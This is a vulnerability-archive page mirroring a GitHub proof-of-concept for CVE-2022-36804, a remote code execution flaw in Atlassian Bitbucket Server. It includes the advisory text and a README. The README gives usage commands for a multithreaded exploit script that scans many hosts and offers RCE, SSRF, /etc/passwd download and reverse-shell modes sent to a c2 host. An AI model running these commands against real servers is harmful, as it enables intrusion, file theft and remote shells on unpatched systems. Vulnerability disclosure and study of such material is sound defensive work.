Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-36804 PoC — Atlassian Bitbucket Server 安全漏洞

Source
https://github.com/notxesh/CVE-2022-36804-PoC
Associated Vulnerability
Title:Atlassian Bitbucket Server 安全漏洞 (CVE-2022-36804)
Description:Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allows remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. This vulnerability was reported via our Bug Bounty Program by TheGrandPew.
Description
Multithreaded exploit script for CVE-2022-36804 affecting BitBucket versions <8.3.1
Readme
# CVE-2022-36804-PoC
Multithreaded exploit script for CVE-2022-36804 affecting (most) BitBucket versions &lt;8.3.1
See the full advisory here https://jira.atlassian.com/browse/BSERV-13438

All credit to [TheGrandPew](https://twitter.com/TheGrandPew) for discovery

The script will automatically detect public repositories located on bitbucket instances then select a random repository to check or perform the vulnerability on. If there are no public repositories a valid 'BITBUCKETSESSIONID' cookie is required in order to exploit known vulnerable instances.

The PoC was designed to take multiple input hosts and pipe vulnerable hosts to stdout allowing for piping of results in order to be processed by other tools.

Do not use for malicious purposes.

## Usage
```bash
usage: CVE-2022-36804.py [-h] [--auth-cookie AUTH_COOKIE] [--proxy PROXY] [-e {check,rce,ssrf,download,rev_shell}] [--cmd CMD] [--knary KNARY] [--server-file SERVER_FILE] [--host HOST] [--port PORT]
                         [--skip-check] [-t THREADS] [-v]
                         repos [repos ...]

CVE-2022-36804 Exploit Script for BitBucket versions < 8.3.1

optional arguments:
  -h, --help            show this help message and exit

required arguments:
  repos                 Repository host/s (http://bitbucket.example.com:7990) (or single input file "./targets.txt" of target hosts) to perfrom CVE-2022-36804 on

optional arguments:
  --auth-cookie AUTH_COOKIE
                        Authentication cookie 'BITBUCKETSESSIONID' value for private repositories
  --proxy PROXY         HTTP Proxy: <http/https>://<ip>:<port>
  -e {check,rce,ssrf,download,rev_shell}, --exploit {check,rce,ssrf,download,rev_shell}
                        Exploit to perform
  --cmd CMD             Command to execute for the 'rce' exploit (curl http://example.com)
  --knary KNARY         Knary to respond too via DNS for the 'ssrf' exploit
  --server-file SERVER_FILE
                        Server file to download for the 'download' exploit (/etc/passwd)
  --host HOST           Hostname or IP address of c2 for the 'rev_shell' exploit
  --port PORT           Port of the c2 for the 'rev_shell' exploit
  --skip-check          Skip vulnerability checking stage
  -t THREADS, --threads THREADS
                        Worker Threads
  -v, --verbose         Increase output verbosity level
```
### Exploit modes

#### Check
> Single Host
>
> `CVE-2022-36804.py http://bitbucket.local:7990/`
>
> Multiple Hosts and piping vulnerable hosts and repositories exploited to file
>
> `CVE-2022-36804.py ./bitbucket-hosts.txt > vulnerable-hosts`

#### RCE (Remote Code Execution)
> `CVE-2022-36804.py -e rce --cmd "curl http://example.com/" http://bitbucket.local:7990/`

#### SSRF (Server-Side Request Forgery)
> Perform a DNS request to the specified knary
> 
> `CVE-2022-36804.py -e ssrf --knary http://knary.example.com http://bitbucket.local:7990/`

#### Download
> Download a repository with the target file `/etc/passwd`, this will save the compressed repository to a randomised file name.
>
> `CVE-2022-36804.py -e download --server-file /etc/passwd http://bitbucket.local:7990/`

#### Rev_shell (Generates a reverse sh shell to the specified host and port)
> `CVE-2022-36804.py -e rev_shell --host 127.0.0.1 --port 31337 http://bitbucket.local:7990/`
File Snapshot

 [4.0K]  /data/pocs/372c50272100a17156bea22b73d2c0c4a14a5c1c
├── [ 14K]  CVE-2022-36804.py
├── [3.3K]  README.md
└── [  44]  requirements.txt

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →